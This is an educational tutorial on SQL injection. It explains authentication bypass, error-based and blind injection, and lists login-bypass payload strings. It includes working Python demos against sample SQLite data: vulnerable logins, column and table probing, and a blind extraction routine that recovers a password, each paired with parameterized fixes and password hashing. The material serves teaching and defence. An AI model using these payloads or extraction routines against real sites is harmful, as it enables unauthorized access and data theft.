CEH 15 - SQL Injection

What is a Database? 

  • A database is an organized collection of data. In a relational database the data is arranged into tables made up of rows and columns.
  • It is indexed so that it can be easily accessed, managed and updated.
  • Data in the database is updated, expanded and deleted as new information is added.
  • Database software examples:
  1. MySQL
  2. Oracle
  3. Microsoft SQL Server
  4. SQLite
  5. MongoDB (a document store rather than a relational database; it does not use SQL)
  6. Microsoft Access
  7. PostgreSQL

What is SQL? 

  • SQL stands for Structured Query Language.
  • SQL is the language used to define and manage relational databases and to create, read, update and delete the data stored in them.
  • SQL is used by database administrators as well as developers to organize and query application data.
  • Web applications interact with the database server by sending it queries.
  • SQL statements include SELECT, INSERT, UPDATE and DELETE for working with data, and CREATE, ALTER, DROP and TRUNCATE for working with the tables themselves.

How Web server and Database server communicates? 

  • A server is software that runs continuously and responds to requests sent by clients.
  • Communication between a client and a server uses a specific protocol, for example HTTP or HTTPS.
  • A server running a web application usually consists of three components:
  1. Web Server 
  2. Application Server 
  3. Database Server 

1. Web Servers:

  • It accepts HTTP / HTTPS requests from clients, serves static content itself and passes requests for dynamic content on to the appropriate handlers.

2. Application Server: 

  • It handles requests for dynamic web pages.
  • The application server processes the user's request and generates the HTML page for the end user, instead of serving a static HTML page stored on disk. This is the layer where the application builds its SQL queries.
  • The application server often runs on the same physical machine as the web server, but it can also be deployed as a separate tier.

3. Database Server: 

  • It is the server that runs the database management system (MySQL, PostgreSQL, SQL Server, etc.) and provides database services to other programs. Applications connect to it through driver APIs such as JDBC or ODBC.
  • Most database servers are driven by a query language.
  • Each database parses the submitted query into its own internal form, executes it and returns the results.
 

That covers the basics of databases and SQL. Now let's move on to the SQL Injection attack.

What is SQL Injection? 

  • SQL Injection (SQLi) is a technique that takes advantage of unvalidated user input being built directly into SQL queries.
  • Through this vulnerability an attacker can pass SQL commands through the web application for execution on the backend database.
  • It can retrieve information directly from the database and, depending on the privileges of the database account the application uses, read, modify or delete data.
  • It is used to gain unauthorized access to the database and the data behind the application.
  • SQL Injection is not a vulnerability in the database or the web server.
  • It is a vulnerability in the web application, caused by assembling queries from untrusted input with string concatenation instead of binding that input as parameters.
  • Types of SQL Injection attacks covered here:
  1. Authentication bypass attack 
  2. Error-based SQL Injection 
  3. Blind SQL Injection

1. Authentication Bypass Attack: 

  • The attacker uses this technique to bypass authentication without knowing a valid username and password.
  • The goal is usually to log in to the web application with administrative privileges.
  • It works when the login query is built by string concatenation, e.g. SELECT * FROM users WHERE username = '<input>' AND password = '<input>'. A single quote in the input closes the string literal, and whatever follows it is executed as SQL.
  • Example: Try injecting the payloads below into the username and password fields of the web application.
  • 1' or '1' = '1   (entered in both fields; the OR '1'='1' makes the WHERE clause true for every row, so the first user, often the admin, is returned)
  • admin' --   (the -- comment removes the password check entirely; MySQL requires a space after --)
  • admin' or '1'='1
  • admin' or 1=1 or ''='
  • admin') or ('1'='1'#   (for queries that wrap the condition in parentheses; # is a MySQL comment character)
  • Quoting and comment syntax differ between databases, so a payload that works against MySQL may need adjusting for other products.
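The login bypass above in working code. This is an added example, not code from the original article: it uses an in-memory SQLite database with constructed sample users, a deliberately vulnerable login that concatenates input into the query, and the parameterized version of the same login for comparison. The table layout, user names and passwords are assumptions made for the demo.

```python
import sqlite3

# Constructed sample data for this demo; not from the original article.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "S3cret!pass", "admin"), ("alice", "hunter2", "user")],
    )
    return conn

def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: the inputs are spliced into the SQL text, so a quote in
    the input closes the string literal and the rest of the input becomes SQL."""
    query = ("SELECT username, role FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone()       # (username, role) or None

def login_safe(conn, username, password):
    """Parameterized: the driver binds the values separately from the SQL text, so the
    same payloads are compared as plain strings and match no user."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()

# The payloads from the article, as (username, password) pairs.
PAYLOADS = [
    ("1' or '1' = '1", "1' or '1' = '1"),
    ("admin' --", "wrong-password"),
    ("admin' or '1'='1", "wrong-password"),
    ("admin' or 1=1 or ''='", "wrong-password"),
]

if __name__ == "__main__":
    conn = make_db()
    for user, pw in PAYLOADS:
        print(f"{user!r:28} vulnerable -> {login_vulnerable(conn, user, pw)}   "
              f"safe -> {login_safe(conn, user, pw)}")
```

Every payload logs the vulnerable function in as admin without the password, while the parameterized function returns no row for any of them and still accepts the real credentials. The `admin') or ('1'='1'#` payload is left out because `#` is not a comment character in SQLite; against MySQL it behaves like the `--` variant.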

2. Error-Based SQL Injection: 

  • Error-based SQL injection relies on the error messages thrown by the database server being passed through to the user.
  • From these errors the attacker learns about the structure of the database: how many columns a query returns, which tables and columns exist, and which DBMS is in use.
  • In some cases error-based SQL injection alone is enough for an attacker to enumerate an entire database, because some databases (MySQL and Microsoft SQL Server, for example) can be made to embed the result of a sub-query in the error text.
  • While detailed errors are very useful during development, they should be disabled on a live site and instead logged to a file with restricted access; the user should only ever see a generic message.
  • By analyzing these errors the attacker can grab system information such as the database type and version, the OS, and data held in the database.
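An added example, not from the original article, of what a verbose error page leaks and how the hardened version behaves. It uses SQLite, whose messages for `ORDER BY` out of range and for a missing table are fixed strings, to count the columns of the vulnerable query and to test for the existence of tables; the schema and data are constructed for the demo. Real error-based extraction on MySQL or SQL Server goes further by using DBMS-specific functions to push query results into the error text, which SQLite does not offer.

```python
import sqlite3

SERVER_LOG = []   # stands in for a log file with restricted access

# Constructed sample data for this demo; not from the original article.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.execute("INSERT INTO items VALUES (1, 'widget', 9.99)")
    return conn

def search_leaky(conn, item_id):
    """Deliberately vulnerable AND verbose: concatenates the input and returns the
    raw database error text to the client, as a debug-mode error page would."""
    try:
        return conn.execute("SELECT name, price FROM items WHERE id = " + item_id).fetchall()
    except sqlite3.Error as e:
        return "DB error: " + str(e)

def search_hardened(conn, item_id):
    """Parameterized query; the full error goes to the server log and the client
    only ever sees a generic message."""
    try:
        return conn.execute("SELECT name, price FROM items WHERE id = ?", (item_id,)).fetchall()
    except sqlite3.Error as e:
        SERVER_LOG.append(f"search failed for {item_id!r}: {e}")
        return "Something went wrong."

def count_columns(probe, max_cols=20):
    """Learn how many columns the vulnerable SELECT returns: ORDER BY n fails as soon
    as n exceeds the column count. Returns None if no error ever leaks."""
    for n in range(1, max_cols + 1):
        response = probe(f"1 ORDER BY {n}")
        if isinstance(response, str) and "out of range" in response:
            return n - 1
    return None

def table_exists(probe, table):
    """Test for a table by name: a 'no such table' error means it is absent."""
    response = probe(f"1 AND (SELECT count(*) FROM {table}) > 0")
    return not (isinstance(response, str) and "no such table" in response)

if __name__ == "__main__":
    conn = make_db()
    leaky = lambda q: search_leaky(conn, q)
    print("raw error:", leaky("1 ORDER BY 3"))
    print("columns in the query:", count_columns(leaky))
    print("users table?", table_exists(leaky, "users"), " items table?", table_exists(leaky, "items"))
    print("columns via hardened endpoint:", count_columns(lambda q: search_hardened(conn, q)))
```

The column count is what an attacker needs before a UNION-based extraction, and the `no such table` probe is how table names are guessed one at a time. Against the hardened endpoint both probes return nothing useful: the input is bound as a value, so `1 ORDER BY 3` is just a string that matches no id, and the client never sees a message.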

3. Blind SQL Injection: 

  • Blind SQL injection asks the database true-or-false questions and infers the answer from the application's response (a different page, a different HTTP status, or a time delay), because the application never shows query results or error messages.
  • This attack is used when the web application is configured to show generic error messages but the code that builds the query is still vulnerable.
  • The injection point is the same as in a normal SQL injection; the only difference is the way the data is retrieved.
  • Because each request yields one yes/no answer, the attacker extracts data one bit or one character at a time, which takes many requests but is easy to automate.
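An added example, not from the original article, of boolean-based blind extraction. The vulnerable endpoint only reports whether an item was found; the attacker appends a condition to a known-good id and binary-searches first the length of a secret and then the code point of each character. SQLite is used with constructed data; the table layout and the secret are assumptions for the demo.

```python
import sqlite3

# Constructed sample data for this demo; not from the original article.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!pass')")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO items VALUES (1, 'widget')")
    return conn

def item_visible(conn, item_id):
    """Deliberately vulnerable, but 'blind': the caller only learns whether the page
    showed an item (True) or not (False). Errors become the same generic 'not found'."""
    try:
        row = conn.execute("SELECT 1 FROM items WHERE id = " + item_id).fetchone()
    except sqlite3.Error:
        return False
    return row is not None

class Oracle:
    """Wraps the vulnerable endpoint and counts how many requests the attack needs."""
    def __init__(self, conn):
        self.conn, self.requests = conn, 0
    def ask(self, condition):
        self.requests += 1
        # id 1 is known to exist, so the page is shown if and only if `condition` is true
        return item_visible(self.conn, "1 AND (" + condition + ")")

def smallest_false(ask, expr, hi):
    """Binary search for the smallest n in [0, hi] for which `expr > n` is false;
    that n is exactly the value of expr (assuming it lies within the range)."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo

def extract_string(oracle, subquery, max_len=64):
    """Recover the single string that `subquery` returns, one character at a time,
    using nothing but true/false answers from the oracle."""
    length = smallest_false(oracle.ask, f"length(({subquery}))", max_len)
    chars = []
    for i in range(1, length + 1):
        code = smallest_false(oracle.ask, f"unicode(substr(({subquery}), {i}, 1))", 127)
        chars.append(chr(code))
    return "".join(chars)

if __name__ == "__main__":
    oracle = Oracle(make_db())
    secret = extract_string(oracle, "SELECT password FROM users WHERE username = 'admin'")
    print(f"recovered {secret!r} in {oracle.requests} true/false requests")
```

Recovering an 11-character secret takes about 80 requests here (7 per character plus a few for the length), which is the cost that makes blind injection slow but still entirely practical. The oracle treats database errors as "not found", so the attacker gets no error text at all, only the page difference. Time-based blind injection works the same way with a conditional delay in place of the page difference.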

Mitigations:

  • Validate all user input (type, length, format) and reject anything that does not match, but do not rely on validation alone.
  • Use parameterized (prepared) statements so that data is always kept separate from the SQL code; this is the primary fix.
  • Reject entries that contain binary data, escape sequences or comment characters where the field has no legitimate need for them.
  • Connect to the database with a least-privilege account: the web application's database user should only have the rights it needs (for example SELECT on a few tables, no DROP and no administrative rights), which limits what a successful injection can do.
  • Store passwords as salted hashes using a slow, secure algorithm; this does not stop the injection, but it means a dumped users table does not hand the attacker working credentials.
  • Perform a source code review before hosting the website.
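The password-storage mitigation in practice, as an added example that is not from the original article. It stores a per-user random salt and a PBKDF2-HMAC-SHA256 hash, looks users up with a parameterized query, and compares in constant time. The iteration count and schema are assumptions for the demo; bcrypt, scrypt or Argon2 are preferable where a library is available.

```python
import hashlib
import hmac
import os
import sqlite3

# Assumption for the demo: PBKDF2-HMAC-SHA256 with 600,000 iterations (OWASP's current
# guidance for PBKDF2). Tune it to your hardware; the point is that it is slow.
ITERATIONS = 600_000

def make_db():
    # Constructed schema for this demo; not from the original article.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, salt BLOB, pw_hash BLOB)")
    return conn

def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)

def register(conn, username, password):
    salt = os.urandom(16)          # unique per user, so equal passwords hash differently
    conn.execute("INSERT INTO users (username, salt, pw_hash) VALUES (?, ?, ?)",
                 (username, salt, hash_password(password, salt)))

def verify(conn, username, password):
    # Parameterized: a payload in `username` is just a string that matches no row.
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    # Constant-time comparison so the check does not leak how many bytes matched.
    return hmac.compare_digest(hash_password(password, salt), stored)

def dump_users(conn):
    """What an attacker who manages to dump the table gets: salts and hashes, no passwords."""
    return conn.execute("SELECT username, salt, pw_hash FROM users").fetchall()

if __name__ == "__main__":
    conn = make_db()
    register(conn, "admin", "S3cret!pass")
    print("correct password:", verify(conn, "admin", "S3cret!pass"))
    print("wrong password:  ", verify(conn, "admin", "guess"))
    print("payload as name: ", verify(conn, "admin' --", "anything"))
    print("table dump:      ", dump_users(conn))
```

The hashing does nothing to close the injection itself, which is what the parameterized lookup does; it limits the damage once an attacker has read the users table, because each hash has to be brute-forced separately at the chosen work factor.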

Be Aware, Be Secure.

Thank You 🙏
